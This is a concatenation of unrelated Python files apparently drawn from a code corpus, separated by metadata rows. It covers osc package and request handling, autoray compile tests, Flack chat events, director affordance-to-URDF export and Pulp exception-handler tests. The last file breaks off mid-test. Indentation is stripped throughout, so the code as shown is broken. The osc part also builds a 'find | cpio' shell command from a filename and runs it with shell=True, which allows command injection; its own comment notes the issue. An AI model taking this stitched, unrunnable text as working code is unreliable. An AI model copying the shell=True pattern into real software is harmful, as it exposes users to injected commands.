def stripETxml(node):
node.tail = None
if node.text != None:
node.text = node.text.replace(" ", "").replace("\n", "")
for child in node.getchildren():
stripETxml(child)
def addGitSource(url):
service_file = os.path.join(os.getcwd(), '_service')
addfile = False
if os.path.exists( service_file ):
services = ET.parse(os.path.join(os.getcwd(), '_service')).getroot()
else:
services = ET.fromstring("<services />")
addfile = True
stripETxml( services )
si = Serviceinfo()
s = si.addGitUrl(services, url)
s = si.addTarUp(services)
s = si.addRecompressTar(services)
s = si.addSetVersion(services)
si.read(s)
# for pretty output
xmlindent(s)
f = open(service_file, 'wb')
f.write(ET.tostring(s, encoding=ET_ENCODING))
f.close()
if addfile:
addFiles( ['_service'] )
def addDownloadUrlService(url):
service_file = os.path.join(os.getcwd(), '_service')
addfile = False
if os.path.exists( service_file ):
services = ET.parse(os.path.join(os.getcwd(), '_service')).getroot()
else:
services = ET.fromstring("<services />")
addfile = True
stripETxml( services )
si = Serviceinfo()
s = si.addDownloadUrl(services, url)
si.read(s)
# for pretty output
xmlindent(s)
f = open(service_file, 'wb')
f.write(ET.tostring(s, encoding=ET_ENCODING))
f.close()
if addfile:
addFiles( ['_service'] )
# download file
path = os.getcwd()
files = os.listdir(path)
si.execute(path)
newfiles = os.listdir(path)
# add verify service for new files
for filename in files:
newfiles.remove(filename)
for filename in newfiles:
if filename.startswith('_service:download_url:'):
s = si.addVerifyFile(services, filename)
# for pretty output
xmlindent(s)
f = open(service_file, 'wb')
f.write(ET.tostring(s, encoding=ET_ENCODING))
f.close()
def addFiles(filenames, prj_obj = None):
for filename in filenames:
if not os.path.exists(filename):
raise oscerr.OscIOError(None, 'file \'%s\' does not exist' % filename)
# init a package dir if we have a normal dir in the "filenames"-list
    # so that it will be found by findpacs() later
pacs = list(filenames)
for filename in filenames:
prj_dir, pac_dir = getPrjPacPaths(filename)
if not is_package_dir(filename) and os.path.isdir(filename) and is_project_dir(prj_dir) \
and conf.config['do_package_tracking']:
prj_name = store_read_project(prj_dir)
prj_apiurl = store_read_apiurl(prj_dir, defaulturl=False)
Package.init_package(prj_apiurl, prj_name, pac_dir, filename)
elif is_package_dir(filename) and conf.config['do_package_tracking']:
print('osc: warning: \'%s\' is already under version control' % filename)
pacs.remove(filename)
elif os.path.isdir(filename) and is_project_dir(prj_dir):
raise oscerr.WrongArgs('osc: cannot add a directory to a project unless ' \
'\'do_package_tracking\' is enabled in the configuration file')
pacs, no_pacs = findpacs(pacs, fatal=False)
for filename in no_pacs:
filename = os.path.normpath(filename)
directory = os.path.join(filename, os.pardir)
if not is_package_dir(directory):
print('osc: warning: \'%s\' cannot be associated to a package' % filename)
continue
resp = raw_input("%s is a directory, do you want to archive it for submission? (y/n) " % (filename))
if resp not in ('y', 'Y'):
continue
archive = "%s.obscpio" % filename
# XXX: hmm we should use subprocess.Popen here (to avoid all the
# issues that come with shell=True...)
run_external("find %s | cpio -o -H newc > %s" % (filename, archive), shell=True)
pacs.extend(findpacs([archive]))
for pac in pacs:
if conf.config['do_package_tracking'] and not pac.todo:
prj = prj_obj or Project(os.path.dirname(pac.absdir), False)
if pac.name in prj.pacs_unvers:
prj.addPackage(pac.name)
print(statfrmt('A', getTransActPath(os.path.join(pac.dir, os.pardir, pac.name))))
for filename in pac.filenamelist_unvers:
if os.path.isdir(os.path.join(pac.dir, filename)):
print('skipping directory \'%s\'' % os.path.join(pac.dir, filename))
else:
pac.todo.append(filename)
elif pac.name in prj.pacs_have:
print('osc: warning: \'%s\' is already under version control' % pac.name)
for filename in pac.todo:
if filename in pac.skipped:
continue
if filename in pac.excluded:
print('osc: warning: \'%s\' is excluded from a working copy' % filename, file=sys.stderr)
continue
try:
pac.addfile(filename)
except oscerr.PackageFileConflict as e:
fname = os.path.join(getTransActPath(pac.dir), filename)
print('osc: warning: \'%s\' is already under version control' % fname)
def getPrjPacPaths(path):
"""
returns the path for a project and a package
from path. This is needed if you try to add
or delete packages:
Examples:
osc add pac1/: prj_dir = CWD;
pac_dir = pac1
osc add /path/to/pac1:
prj_dir = path/to;
pac_dir = pac1
osc add /path/to/pac1/file
=> this would be an invalid path
the caller has to validate the returned
path!
"""
    # make sure we have a dir: osc add bar vs. osc add bar/; osc add /path/to/prj_dir/new_pack
# filename = os.path.join(tail, '')
prj_dir, pac_dir = os.path.split(os.path.normpath(path))
if prj_dir == '':
prj_dir = os.getcwd()
return (prj_dir, pac_dir)
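# Illustrative sketch (not executed): how a package path is split into its
# project dir and package dir.
#
#   getPrjPacPaths('pac1')           # -> (os.getcwd(), 'pac1')
#   getPrjPacPaths('/path/to/pac1')  # -> ('/path/to', 'pac1')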
def getTransActPath(pac_dir):
"""
returns the path for the commit and update operations/transactions.
Normally the "dir" attribute of a Package() object will be passed to
this method.
"""
if pac_dir != '.':
pathn = os.path.normpath(pac_dir)
else:
pathn = ''
return pathn
def get_commit_message_template(pac):
"""
    Read the differences in the .changes file(s) and use them as a template for the commit message.
"""
diff = []
template = []
if pac.todo:
todo = pac.todo
else:
todo = pac.filenamelist + pac.filenamelist_unvers
files = [i for i in todo if i.endswith('.changes') and pac.status(i) in ('A', 'M')]
for filename in files:
if pac.status(filename) == 'M':
diff += get_source_file_diff(pac.absdir, filename, pac.rev)
elif pac.status(filename) == 'A':
f = open(os.path.join(pac.absdir, filename), 'r')
for line in f:
diff += '+' + line
f.close()
if diff:
template = parse_diff_for_commit_message(''.join(diff))
return template
def parse_diff_for_commit_message(diff, template = []):
date_re = re.compile(r'\+(Mon|Tue|Wed|Thu|Fri|Sat|Sun) ([A-Z][a-z]{2}) ( ?[0-9]|[0-3][0-9]) .*')
diff = diff.split('\n')
    # the first three lines of the diff are its header; skip them
for line in diff[3:]:
# this condition is magical, but it removes all unwanted lines from commit message
if not(line) or (line and line[0] != '+') or \
date_re.match(line) or \
line == '+' or line[0:3] == '+++':
continue
if line == '+-------------------------------------------------------------------':
template.append('')
else:
template.append(line[1:])
return template
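# Illustrative sketch (not executed; the diff content is made up): only the
# added non-date lines of a .changes diff end up in the template.
#
#   diff = '\n'.join(['--- foo.changes', '+++ foo.changes', '@@ -1,0 +1,2 @@',
#                     '+Mon Jan  1 00:00:00 UTC 2018 - user@example.com',
#                     '+- fix something'])
#   parse_diff_for_commit_message(diff)   # -> ['- fix something']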
def get_commit_msg(wc_dir, pacs):
template = store_read_file(wc_dir, '_commit_msg')
# open editor for commit message
# but first, produce status and diff to append to the template
footer = []
lines = []
for p in pacs:
        states = sorted(p.get_status(False, ' ', '?'), key=lambda x: x[1])
changed = [statfrmt(st, os.path.normpath(os.path.join(p.dir, filename))) for st, filename in states]
if changed:
footer += changed
footer.append('\nDiff for working copy: %s' % p.dir)
footer.extend([''.join(i) for i in p.get_diff(ignoreUnversioned=True)])
lines.extend(get_commit_message_template(p))
if template is None:
if lines and lines[0] == '':
del lines[0]
template = '\n'.join(lines)
msg = ''
# if footer is empty, there is nothing to commit, and no edit needed.
if footer:
msg = edit_message(footer='\n'.join(footer), template=template)
if msg:
store_write_string(wc_dir, '_commit_msg', msg + '\n')
else:
store_unlink_file(wc_dir, '_commit_msg')
return msg
def print_request_list(apiurl, project, package = None, states = ('new', 'review', ), force = False):
"""
prints list of pending requests for the specified project/package if "check_for_request_on_action"
is enabled in the config or if "force" is set to True
"""
if not conf.config['check_for_request_on_action'] and not force:
return
requests = get_request_list(apiurl, project, package, req_state=states)
msg = 'Pending requests for %s: %s (%s)'
if package is None and len(requests):
print(msg % ('project', project, len(requests)))
elif len(requests):
print(msg % ('package', '/'.join([project, package]), len(requests)))
for r in requests:
print(r.list_view(), '\n')
def request_interactive_review(apiurl, request, initial_cmd='', group=None,
ignore_reviews=False, source_buildstatus=False):
"""review the request interactively"""
import tempfile, re
tmpfile = None
def safe_change_request_state(*args, **kwargs):
try:
change_request_state(*args, **kwargs)
return True
except HTTPError as e:
print('Server returned an error:', e, file=sys.stderr)
print('Try -f to force the state change', file=sys.stderr)
return False
def print_request(request):
print(request)
def print_source_buildstatus(src_actions, newline=False):
if newline:
print()
for action in src_actions:
print('%s/%s:' % (action.src_project, action.src_package))
try:
print('\n'.join(get_results(apiurl, action.src_project, action.src_package)))
except HTTPError as e:
if e.code != 404:
raise
print('unable to retrieve the buildstatus: %s' % e)
print_request(request)
print_comments(apiurl, 'request', request.reqid)
try:
prompt = '(a)ccept/(d)ecline/(r)evoke/c(l)one/co(m)ment/(s)kip/(c)ancel > '
editable_actions = request.get_actions('submit', 'maintenance_incident')
# actions which have sources + buildresults
src_actions = editable_actions + request.get_actions('maintenance_release')
if editable_actions:
prompt = 'd(i)ff/(a)ccept/(d)ecline/(r)evoke/(b)uildstatus/c(l)one/(e)dit/co(m)ment/(s)kip/(c)ancel > '
elif src_actions:
# no edit for maintenance release requests
prompt = 'd(i)ff/(a)ccept/(d)ecline/(r)evoke/(b)uildstatus/c(l)one/co(m)ment/(s)kip/(c)ancel > '
editprj = ''
orequest = None
if source_buildstatus and src_actions:
print_source_buildstatus(src_actions, newline=True)
while True:
if initial_cmd:
repl = initial_cmd
initial_cmd = ''
else:
repl = raw_input(prompt).strip()
if repl == 'i' and src_actions:
if not orequest is None and tmpfile:
tmpfile.close()
tmpfile = None
if tmpfile is None:
tmpfile = tempfile.NamedTemporaryFile(suffix='.diff')
try:
diff = request_diff(apiurl, request.reqid)
tmpfile.write(diff)
except HTTPError as e:
if e.code != 400:
raise
# backward compatible diff for old apis
for action in src_actions:
diff = 'old: %s/%s\nnew: %s/%s\n' % (action.src_project, action.src_package,
action.tgt_project, action.tgt_package)
diff += submit_action_diff(apiurl, action)
diff += '\n\n'
tmpfile.write(diff)
tmpfile.flush()
run_editor(tmpfile.name)
print_request(request)
print_comments(apiurl, 'request', request.reqid)
elif repl == 's':
print('skipping: #%s' % request.reqid, file=sys.stderr)
break
elif repl == 'c':
print('Aborting', file=sys.stderr)
raise oscerr.UserAbort()
elif repl == 'm':
comment = edit_text()
create_comment(apiurl, 'request', comment, request.reqid)
elif repl == 'b' and src_actions:
print_source_buildstatus(src_actions)
elif repl == 'e' and editable_actions:
# this is only for editable actions
if not editprj:
editprj = clone_request(apiurl, request.reqid, 'osc editrequest')
orequest = request
request = edit_submitrequest(apiurl, editprj, orequest, request)
src_actions = editable_actions = request.get_actions('submit', 'maintenance_incident')
print_request(request)
prompt = 'd(i)ff/(a)ccept/(b)uildstatus/(e)dit/(s)kip/(c)ancel > '
else:
state_map = {'a': 'accepted', 'd': 'declined', 'r': 'revoked'}
mo = re.search('^([adrl])(?:\s+(-f)?\s*-m\s+(.*))?$', repl)
if mo is None or orequest and mo.group(1) != 'a':
print('invalid choice: \'%s\'' % repl, file=sys.stderr)
continue
state = state_map.get(mo.group(1))
force = mo.group(2) is not None
msg = mo.group(3)
footer = ''
msg_template = ''
if not (state is None or request.state is None):
footer = 'changing request from state \'%s\' to \'%s\'\n\n' \
% (request.state.name, state)
msg_template = change_request_state_template(request, state)
footer += str(request)
if tmpfile is not None:
tmpfile.seek(0)
# the read bytes probably have a moderate size so the str won't be too large
footer += '\n\n' + tmpfile.read()
if msg is None:
try:
msg = edit_message(footer = footer, template=msg_template)
except oscerr.UserAbort:
# do not abort (show prompt again)
continue
else:
msg = msg.strip('\'').strip('"')
if not orequest is None:
request.create(apiurl)
if not safe_change_request_state(apiurl, request.reqid, 'accepted', msg, force=force):
                    # an error occurred
continue
repl = raw_input('Supersede original request? (y|N) ')
if repl in ('y', 'Y'):
safe_change_request_state(apiurl, orequest.reqid, 'superseded',
'superseded by %s' % request.reqid, request.reqid, force=force)
elif state is None:
clone_request(apiurl, request.reqid, msg)
else:
reviews = [r for r in request.reviews if r.state == 'new']
if not reviews or ignore_reviews:
if safe_change_request_state(apiurl, request.reqid, state, msg, force=force):
break
else:
                        # an error occurred
continue
group_reviews = [r for r in reviews if (r.by_group is not None
and r.by_group == group)]
if len(group_reviews) == 1 and conf.config['review_inherit_group']:
review = group_reviews[0]
else:
                    print('Please choose one of the following reviews:')
for i in range(len(reviews)):
fmt = Request.format_review(reviews[i])
print('(%i)' % i, 'by %(type)-10s %(by)s' % fmt)
num = raw_input('> ')
try:
num = int(num)
except ValueError:
print('\'%s\' is not a number.' % num)
continue
if num < 0 or num >= len(reviews):
print('number \'%s\' out of range.' % num)
continue
review = reviews[num]
change_review_state(apiurl, request.reqid, state, by_user=review.by_user,
by_group=review.by_group, by_project=review.by_project,
by_package=review.by_package, message=msg)
break
finally:
if tmpfile is not None:
tmpfile.close()
def edit_submitrequest(apiurl, project, orequest, new_request=None):
"""edit a submit action from orequest/new_request"""
import tempfile, shutil
actions = orequest.get_actions('submit')
oactions = actions
if new_request is not None:
actions = new_request.get_actions('submit')
num = 0
if len(actions) > 1:
        print('Please choose one of the following submit actions:')
for i in range(len(actions)):
# it is safe to use orequest because currently the formatting
# of a submit action does not need instance specific data
fmt = orequest.format_action(actions[i])
print('(%i)' % i, '%(source)s %(target)s' % fmt)
num = raw_input('> ')
try:
num = int(num)
except ValueError:
raise oscerr.WrongArgs('\'%s\' is not a number.' % num)
if num < 0 or num >= len(orequest.actions):
raise oscerr.WrongArgs('number \'%s\' out of range.' % num)
# the api replaced ':' with '_' in prj and pkg names (clone request)
package = '%s.%s' % (oactions[num].src_package.replace(':', '_'),
oactions[num].src_project.replace(':', '_'))
tmpdir = None
cleanup = True
try:
tmpdir = tempfile.mkdtemp(prefix='osc_editsr')
p = Package.init_package(apiurl, project, package, tmpdir)
p.update()
shell = os.getenv('SHELL', default='/bin/sh')
olddir = os.getcwd()
os.chdir(tmpdir)
print('Checked out package \'%s\' to %s. Started a new shell (%s).\n' \
'Please fix the package and close the shell afterwards.' % (package, tmpdir, shell))
run_external(shell)
# the pkg might have uncommitted changes...
cleanup = False
os.chdir(olddir)
# reread data
p = Package(tmpdir)
modified = p.get_status(False, ' ', '?', 'S')
if modified:
print('Your working copy has the following modifications:')
print('\n'.join([statfrmt(st, filename) for st, filename in modified]))
repl = raw_input('Do you want to commit the local changes first? (y|N) ')
if repl in ('y', 'Y'):
msg = get_commit_msg(p.absdir, [p])
p.commit(msg=msg)
cleanup = True
finally:
if cleanup:
shutil.rmtree(tmpdir)
else:
print('Please remove the dir \'%s\' manually' % tmpdir)
r = Request()
for action in orequest.get_actions():
new_action = Action.from_xml(action.to_xml())
r.actions.append(new_action)
if new_action.type == 'submit':
new_action.src_package = '%s.%s' % (action.src_package.replace(':', '_'),
action.src_project.replace(':', '_'))
new_action.src_project = project
# do an implicit cleanup
new_action.opt_sourceupdate = 'cleanup'
return r
def get_user_projpkgs(apiurl, user, role=None, exclude_projects=[], proj=True, pkg=True, maintained=False, metadata=False):
"""Return all project/packages where user is involved."""
xpath = 'person/@userid = \'%s\'' % user
excl_prj = ''
excl_pkg = ''
for i in exclude_projects:
excl_prj = xpath_join(excl_prj, 'not(@name = \'%s\')' % i, op='and')
excl_pkg = xpath_join(excl_pkg, 'not(@project = \'%s\')' % i, op='and')
role_filter_xpath = xpath
if role:
xpath = xpath_join(xpath, 'person/@role = \'%s\'' % role, inner=True, op='and')
xpath_pkg = xpath_join(xpath, excl_pkg, op='and')
xpath_prj = xpath_join(xpath, excl_prj, op='and')
if maintained:
xpath_pkg = xpath_join(xpath_pkg, '(project/attribute/@name=\'%(attr)s\' or attribute/@name=\'%(attr)s\')' % {'attr': conf.config['maintained_attribute']}, op='and')
what = {}
if pkg:
if metadata:
what['package'] = xpath_pkg
else:
what['package_id'] = xpath_pkg
if proj:
if metadata:
what['project'] = xpath_prj
else:
what['project_id'] = xpath_prj
try:
res = search(apiurl, **what)
except HTTPError as e:
if e.code != 400 or not role_filter_xpath:
raise e
# backward compatibility: local role filtering
what = dict([[kind, role_filter_xpath] for kind in what.keys()])
if 'package' in what:
what['package'] = xpath_join(role_filter_xpath, excl_pkg, op='and')
if 'project' in what:
what['project'] = xpath_join(role_filter_xpath, excl_prj, op='and')
res = search(apiurl, **what)
filter_role(res, user, role)
return res
def raw_input(*args):
try:
import builtins
func = builtins.input
except ImportError:
#python 2.7
import __builtin__
func = __builtin__.raw_input
try:
return func(*args)
except EOFError:
# interpret ctrl-d as user abort
raise oscerr.UserAbort()
def run_external(filename, *args, **kwargs):
"""Executes the program filename via subprocess.call.
*args are additional arguments which are passed to the
program filename. **kwargs specify additional arguments for
the subprocess.call function.
if no args are specified the plain filename is passed
to subprocess.call (this can be used to execute a shell
command). Otherwise [filename] + list(args) is passed
to the subprocess.call function.
"""
# unless explicitly specified use shell=False
kwargs.setdefault('shell', False)
if args:
cmd = [filename] + list(args)
else:
cmd = filename
try:
return subprocess.call(cmd, **kwargs)
except OSError as e:
if e.errno != errno.ENOENT:
raise
raise oscerr.ExtRuntimeError(e.strerror, filename)
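# Illustrative usage of run_external (added comment, not part of the original
# module; assumes standard POSIX tools are on PATH):
#
#   run_external('ls', '-l', '/tmp')        # -> subprocess.call(['ls', '-l', '/tmp'])
#   run_external('ls -l /tmp', shell=True)  # -> subprocess.call('ls -l /tmp', shell=True)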
def return_external(filename, *args, **kwargs):
"""Executes the program filename via subprocess.check_output.
*args are additional arguments which are passed to the
program filename. **kwargs specify additional arguments for
the subprocess.check_output function.
if no args are specified the plain filename is passed
to subprocess.check_output (this can be used to execute a shell
command). Otherwise [filename] + list(args) is passed
to the subprocess.check_output function.
Returns the output of the command.
"""
if args:
cmd = [filename] + list(args)
else:
cmd = filename
try:
return subprocess.check_output(cmd, **kwargs)
except OSError as e:
if e.errno != errno.ENOENT:
raise
raise oscerr.ExtRuntimeError(e.strerror, filename)
# backward compatibility: local role filtering
def filter_role(meta, user, role):
"""
remove all project/package nodes if no person node exists
where @userid=user and @role=role
"""
for kind, root in meta.items():
delete = []
for node in root.findall(kind):
found = False
for p in node.findall('person'):
if p.get('userid') == user and p.get('role') == role:
found = True
break
if not found:
delete.append(node)
for node in delete:
root.remove(node)
def find_default_project(apiurl=None, package=None):
""""
look though the list of conf.config['getpac_default_project']
and find the first project where the given package exists in the build service.
"""
if not len(conf.config['getpac_default_project']):
return None
candidates = re.split('[, ]+', conf.config['getpac_default_project'])
if package is None or len(candidates) == 1:
return candidates[0]
# search through the list, where package exists ...
for prj in candidates:
try:
# any fast query will do here.
show_package_meta(apiurl, prj, package)
return prj
except HTTPError:
pass
return None
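# Example (hypothetical) configuration consumed by find_default_project; the
# project names below are placeholders, not taken from the original source:
#
#   conf.config['getpac_default_project'] = 'openSUSE:Factory, server:mail'
#
# With a package name given, the first listed project that contains the
# package wins; otherwise the first entry is returned.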
def utime(filename, arg, ignore_einval=True):
"""wrapper around os.utime which ignore errno EINVAL by default"""
try:
        # workaround for bnc#857610: if filename resides on an nfs share
# os.utime might raise EINVAL
os.utime(filename, arg)
except OSError as e:
if e.errno == errno.EINVAL and ignore_einval:
return
raise
def which(name):
"""Searches "name" in PATH."""
name = os.path.expanduser(name)
if os.path.isabs(name):
if os.path.exists(name):
return name
return None
for directory in os.environ.get('PATH', '').split(':'):
path = os.path.join(directory, name)
if os.path.exists(path):
return path
return None
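# Illustrative behaviour of which() (added comment; the example paths are
# assumptions, actual results depend on the local PATH):
#
#   which('sh')        -> e.g. '/bin/sh' when /bin is on PATH, otherwise None
#   which('~/bin/foo') -> the expanded absolute path if that file exists, else None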
def get_comments(apiurl, kind, *args):
url = makeurl(apiurl, ('comments', kind) + args)
f = http_GET(url)
return ET.parse(f).getroot()
def print_comments(apiurl, kind, *args):
def print_rec(comments, indent=''):
for comment in comments:
print(indent, end='')
print('(', comment.get('id'), ')', 'On', comment.get('when'), comment.get('who'), 'wrote:')
text = indent + comment.text.replace('\r\n',' \n')
print(('\n' + indent).join(text.split('\n')))
print()
print_rec([c for c in root if c.get('parent') == comment.get('id')], indent + ' ')
root = get_comments(apiurl, kind, *args)
comments = [c for c in root if c.get('parent') is None]
if comments:
print('\nComments:')
print_rec(comments)
def create_comment(apiurl, kind, comment, *args, **kwargs):
query = {}
if kwargs.get('parent') is not None:
query = {'parent_id': kwargs['parent']}
u = makeurl(apiurl, ('comments', kind) + args, query=query)
f = http_POST(u, data=comment)
ret = ET.fromstring(f.read()).find('summary')
return ret.text
def delete_comment(apiurl, cid):
u = makeurl(apiurl, ['comment', cid])
f = http_DELETE(u)
ret = ET.fromstring(f.read()).find('summary')
return ret.text
# vim: sw=4 et
| gpl-2.0 | -316,398,223,788,239,000 | 37.421317 | 364 | 0.551383 | false |
jcmgray/autoray | tests/test_autocompile.py | 1 | 2460 | import pytest
from autoray import do, autojit, infer_backend, to_numpy
from .test_autoray import BACKENDS, gen_rand
from numpy.testing import assert_allclose
BACKENDS = [
p for p in BACKENDS if p.values[0] in ("jax", "torch", "tensorflow")
]
def modified_gram_schmidt(X):
Q = []
for j in range(0, X.shape[0]):
q = X[j, :]
for i in range(0, j):
rij = do("tensordot", do("conj", Q[i]), q, axes=1)
q = q - rij * Q[i]
rjj = do("linalg.norm", q, 2)
Q.append(q / rjj)
return do("stack", tuple(Q), axis=0)
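# Quick orthonormality check for modified_gram_schmidt (illustrative sketch,
# not part of the original test suite; uses numpy directly on the stacked rows):
#
#   import numpy as np
#   X = gen_rand((5, 5), "numpy")
#   Q = modified_gram_schmidt(X)
#   assert np.allclose(Q @ np.conj(Q).T, np.eye(5), atol=1e-8)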
@pytest.fixture
def mgs_case():
x = gen_rand((10, 10), "numpy")
y = modified_gram_schmidt(x)
return x, y
@pytest.mark.parametrize("share_intermediates", [False, True])
@pytest.mark.parametrize("nested", [False, True])
def test_compile_python(mgs_case, share_intermediates, nested):
x, y = mgs_case
compiler_opts = {"python": {"share_intermediates": share_intermediates}}
mgs = autojit(modified_gram_schmidt, compiler_opts=compiler_opts)
if nested:
mgs = autojit(mgs, compiler_opts=compiler_opts)
y2 = mgs(x)
assert_allclose(y, y2)
@pytest.mark.parametrize("backend", BACKENDS)
def test_others_numpy(backend, mgs_case):
x, y = mgs_case
mgs = autojit(modified_gram_schmidt)
y2 = mgs(x, backend=backend)
assert infer_backend(y2) == "numpy"
assert_allclose(y, y2)
@pytest.mark.parametrize("backend", BACKENDS)
def test_autodispatch(backend, mgs_case):
x, y = mgs_case
x = do("array", x, like=backend)
mgs = autojit(modified_gram_schmidt)
y2 = mgs(x, backend=backend)
assert infer_backend(y2) == backend
assert_allclose(y, to_numpy(y2))
def test_complicated_signature():
@autojit
def foo(a, b, c):
a1, a2 = a
b1 = b['1']
c1, c2 = c['sub']
return do('sum', do('stack', (a1, a2, b1, c1, c2)), axis=0)
x = do('random.uniform', size=(5, 7), like='numpy')
y = foo((x[0, :], x[1, :]), {'1': x[2, :]}, c={'sub': (x[3, :], x[4, :])})
assert_allclose(y, x.sum(0))
def test_static_kwargs_change():
@autojit
def foo(a, b, c):
if c == 'sum':
return a + b
elif c == 'sub':
return a - b
assert foo(do('array', 100, like='numpy'),
do('array', 1, like='numpy'), 'sum') == 101
assert foo(do('array', 100, like='numpy'),
do('array', 1, like='numpy'), 'sub') == 99
| apache-2.0 | 5,361,797,290,353,655,000 | 26.333333 | 78 | 0.576016 | false |
send2zhao/boilerplate | flack/events.py | 2 | 2062 | from flask import g, session
from . import db, socketio, celery
from .models import User, Message
from .auth import verify_token
def push_model(model):
"""Push the model to all connected Socket.IO clients."""
socketio.emit('updated_model', {'class': model.__class__.__name__,
'model': model.to_dict()})
@socketio.on('ping_user')
def on_ping_user(token):
"""Clients must send this event periodically to keep the user online."""
verify_token(token, add_to_session=True)
if g.current_user:
# Mark the user as still online
g.current_user.ping()
@celery.task
def post_message(user_id, data):
"""Celery task that posts a message."""
from .wsgi_aux import app
with app.app_context():
user = User.query.get(user_id)
if user is None:
return
# Write the message to the database
msg = Message.create(data, user=user, expand_links=False)
db.session.add(msg)
db.session.commit()
# broadcast the message to all clients
push_model(msg)
if msg.expand_links():
db.session.commit()
# broadcast the message again, now with links expanded
push_model(msg)
# clean up the database session
db.session.remove()
@socketio.on('post_message')
def on_post_message(data, token):
"""Clients send this event to when the user posts a message."""
verify_token(token, add_to_session=True)
if g.current_user:
post_message.apply_async(args=(g.current_user.id, data))
@socketio.on('disconnect')
def on_disconnect():
"""A Socket.IO client has disconnected. If we know who the user is, then
update our state accordingly.
"""
nickname = session.get('nickname')
if nickname:
# we have the nickname in the session, we can mark the user as offline
user = User.query.filter_by(nickname=nickname).first()
if user:
user.online = False
db.session.commit()
push_model(user)
| mit | 6,596,085,107,764,467,000 | 28.457143 | 78 | 0.621242 | false |
rdeits/director | src/python/ddapp/affordanceurdf.py | 6 | 2352 | from ddapp import transformUtils
from ddapp import affordanceitems
from urdf_parser_py import urdf
def geometryFromAffordance(aff):
if isinstance(aff, affordanceitems.SphereAffordanceItem):
radius = aff.getProperty('Radius')
return urdf.Sphere(radius=radius)
if isinstance(aff, affordanceitems.BoxAffordanceItem):
dimensions = aff.getProperty('Dimensions')
return urdf.Box(size=dimensions)
if isinstance(aff, affordanceitems.CylinderAffordanceItem):
return urdf.Cylinder(length=aff.getProperty('Length'), radius=aff.getProperty('Radius'))
if isinstance(aff, affordanceitems.CapsuleAffordanceItem):
return urdf.Cylinder(length=aff.getProperty('Length'), radius=aff.getProperty('Radius'))
if isinstance(aff, affordanceitems.CapsuleRingAffordanceItem):
raise Exception('not supported yet')
if isinstance(aff, affordanceitems.MeshAffordanceItem):
filename = aff.getProperty('Filename')
filename = affordanceitems.MeshAffordanceItem.getMeshManager().getFilesystemFilename(filename)
return urdf.Mesh(filename=filename, scale=[1.0, 1.0, 1.0])
def stringWithAffordanceId(inputStr, aff):
return inputStr % aff.getProperty('uuid')
def colorFromAffordance(aff):
color = aff.getProperty('Color')
    return urdf.Color(color[0], color[1], color[2], 1)
def materialFromAffordance(aff):
color = colorFromAffordance(aff)
return urdf.Material(name=stringWithAffordanceId('material_%s', aff), color=color, texture=None)
def poseFromAffordance(aff):
t = aff.getChildFrame().transform
position, quat = transformUtils.poseFromTransform(t)
rpy = transformUtils.rollPitchYawFromTransform(t)
return urdf.Pose(position, rpy)
def linkFromAffordance(aff):
geometry = geometryFromAffordance(aff)
material = materialFromAffordance(aff)
pose = poseFromAffordance(aff)
visual = urdf.Visual(geometry=geometry, material=material, origin=pose)
collision = urdf.Collision(geometry=geometry, origin=pose)
return urdf.Link(name=stringWithAffordanceId('link_%s', aff), visual=visual, collision=collision)
def urdfStringFromAffordances(affordanceList):
r = urdf.Robot(name='affordance_environment')
for aff in affordanceList:
r.add_link(linkFromAffordance(aff))
return r.to_xml_string()
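# Illustrative usage (added comment; affordance objects come from the running
# director application, so this is only a sketch with an assumed output path):
#
#   xml_string = urdfStringFromAffordances(affordanceList)
#   open('/tmp/affordance_environment.urdf', 'w').write(xml_string)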
| bsd-3-clause | 7,587,478,557,699,453,000 | 33.588235 | 102 | 0.741922 | false |
mibanescu/pulp | client_admin/test/unit/test_admin_exception_handler.py | 15 | 5327 | import mock
from pulp.bindings import exceptions as bindings_exceptions
from pulp.client.admin.exception_handler import AdminExceptionHandler
from pulp.client.extensions import exceptions
from pulp.client.extensions.core import TAG_FAILURE, TAG_PARAGRAPH
from pulp.common import auth_utils
from pulp.devel.unit import base
class AdminExceptionHandlerTests(base.PulpClientTests):
def setUp(self):
super(AdminExceptionHandlerTests, self).setUp()
self.handler = AdminExceptionHandler(self.prompt, self.config)
def test_handle_authentication_failed(self):
# Test
self.handler._handle_authentication_failed()
# Verify
self.assertTrue('Authentication' in self.recorder.lines[0])
self.assertEqual(TAG_FAILURE, self.prompt.get_write_tags()[0])
self.assertTrue('certificate' in self.recorder.lines[2]) # skip blank line
self.assertEqual(TAG_PARAGRAPH, self.prompt.get_write_tags()[1])
def test_handle_permission_error(self):
# Test
self.handler._handle_permission_error()
# Verify
self.assertTrue('Permissions' in self.recorder.lines[0])
self.assertEqual(TAG_FAILURE, self.prompt.get_write_tags()[0])
self.assertTrue('appropriate permissions' in self.recorder.lines[2]) # skip blank line
self.assertEqual(TAG_PARAGRAPH, self.prompt.get_write_tags()[1])
def test_handle_invalid_username(self):
# Test
self.handler._handle_invalid_username()
# Verify
self.assertTrue('Invalid Username' in self.recorder.lines[0])
self.assertEqual(TAG_FAILURE, self.prompt.get_write_tags()[0])
def test_handle_unknown(self):
# Test
self.handler._handle_unknown()
# Verify
self.assertTrue('Unknown' in self.recorder.lines[0])
self.assertEqual(TAG_FAILURE, self.prompt.get_write_tags()[0])
self.assertTrue('server log' in self.recorder.lines[2]) # skip blank line
self.assertEqual(TAG_PARAGRAPH, self.prompt.get_write_tags()[1])
def test_handle_expired_client_cert(self):
# Test
e = bindings_exceptions.ClientCertificateExpiredException('x')
code = self.handler.handle_expired_client_cert(e)
# Verify
self.assertEqual(code, exceptions.CODE_PERMISSIONS_EXCEPTION)
self.assertEqual(TAG_PARAGRAPH, self.prompt.get_write_tags()[1])
self.assertTrue('session certificate' in self.recorder.lines[2])
class AdminExceptionHandlerDispatchingTests(base.PulpClientTests):
def setUp(self):
super(AdminExceptionHandlerDispatchingTests, self).setUp()
# Mock out all of the handling methods, we're just testing to see that the
# dispatching from error code to handle method is correct
self.handler = AdminExceptionHandler(self.prompt, self.config)
self.handler._handle_authentication_failed = mock.MagicMock()
self.handler._handle_invalid_username = mock.MagicMock()
self.handler._handle_permission_error = mock.MagicMock()
self.handler._handle_unknown = mock.MagicMock()
def test_handle_code_failed(self):
# Setup
response_doc = auth_utils.generate_failure_response(auth_utils.CODE_FAILED)
e = bindings_exceptions.PermissionsException(response_doc)
# Test
code = self.handler.handle_permission(e)
# Verify
self.assertEqual(code, exceptions.CODE_PERMISSIONS_EXCEPTION)
self.assertEqual(self.handler._handle_authentication_failed.call_count, 1)
def test_handle_code_permission(self):
# Setup
response_doc = auth_utils.generate_failure_response(auth_utils.CODE_PERMISSION)
e = bindings_exceptions.PermissionsException(response_doc)
# Test
code = self.handler.handle_permission(e)
